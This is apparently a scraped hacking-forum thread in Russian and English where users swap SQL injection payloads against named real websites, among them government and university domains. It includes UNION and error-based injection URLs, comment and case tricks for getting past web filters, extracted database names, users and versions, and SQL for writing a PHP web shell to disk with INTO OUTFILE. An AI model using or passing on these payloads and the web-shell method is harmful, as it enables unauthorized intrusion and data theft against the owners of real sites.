это бинари, скорей всего или собственная схема хеширования. Итальянской кодировки не бывает - есть кодировки, поддерживающие итальянский, они обычно встроены в браузер - вид->кодировка и выбираешь из списка.
Code: http://www.kudosshowers.co.uk/gallery.php?id=-3+order+by+2[b]ERROR![/b] Code: http://www.kudosshowers.co.uk/gallery.php?id=-3+order+by+1[b]Clean![/b] But Union Select does not work. Code: http://www.kudosshowers.co.uk/gallery.php?id=-3+and+1=0+union+select+1 Gives error, any solution?
http://www.kudosshowers.co.uk/gallery.php?id=-3+and+0+union+select+version()--+ Open the source <img src="images/logo-5.1.41-3ubuntu12.10.jpg"
Thanks a lot. Code: <tr><td colspan="4"><img src="images/logo-5.1.41-3ubuntu12.10.jpg" alt="Gallery" title="Gallery" /><td></tr> What about this? Code: http://hcpoa.com/readnews.php?id=null+union+all+select+1,2,3,4+--+
http://hcpoa.com/readnews.php?id=1+or+1+group+by+concat(version(),floor(rand(0)*2)%20)having+min(0)+or+1--+ Duplicate entry '3.23.581' for key 1
Всем привет!) товарищи, которые работают с sql injections. посоветуйте прогу или лучше скажите какой вы пользуетесь для их поиска а то моя уже вымерла походу(
Помогите разобраться http://www.cideko.com/pro_con.php?id=3 - group by работает но union select - ошибка и http://www.greenbergresearch.com/index.php?ID=1 тоже самое никак не могу обойти фильтрацию
Code: http://www.greenbergresearch.com/index.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,unhex(hex([COLOR=Green]database()[/COLOR])),14--+f Warning: main(/var/www/html/inc/templates/[COLOR=Yellow]greenbergdevDB[/COLOR]): failed to open stream: No such file or directory in /var/www/html/index.php on line 195 http://www.greenbergresearch.com/index.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,unhex(hex([COLOR=Green]user()[/COLOR])),14--+f Warning: main(/var/www/html/inc/templates/[COLOR=Yellow]greenbergUser@localhost[/COLOR]): failed to open stream: No such file or directory in /var/www/html/index.php on line 195
Code: CREATE TABLE `test_shell` (`shl` TEXT NOT NULL) TYPE = MYISAM ; INSERT INTO `test_shell` ( `shl` ) VALUES (`пхп-код`); SELECT `shl` FROM `test_shell` INTO OUTFILE `путь/имяфайла.php` DROP TABLE `test_shell`
Реально ли залить картинку с пхп кодом внутри и сохранить этот код после обработки? В начале файла добавляется: CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90 ну и пхп код сносит само собой
help I have a WAF problem.. Code: http://www.iccs.edu/news_details.php?id=-5%27+un/**/ion+se/**/lect+1,2,3,4,5+--+ Code: http://www.iccs.edu/news_details.php?id=-5%27+UNunionION+SEselectLECT+1,2,3,4,5+--+ But can't find vulnerable number! Any help?
http://www.iccs.edu/news_details.php?id=5+and+0+/*!UnIoN+SeLeCt*/+1,2,3,4,5--+ lightangel try to understand a principle of injection no need to add a quote after vuln Parameter, if injection type is INTEGER, you'll just break the syntax
Thanks. Is this site vulnerable? Code: http://www.vidol.gov/dol_news.php?page=-3' And I did everything showing it's injectable. Problem is, I tried error based, only brings this error. Code: http://www.vidol.gov/dol_news.php?errmsg=You+have+specified+an+invalid+page+number. Any help?
lightangel, read this article: http://forum.antichat.ru/thread104591.html (about sql inj) and this: http://forum.antichat.ru/threadnav43966-1-10.html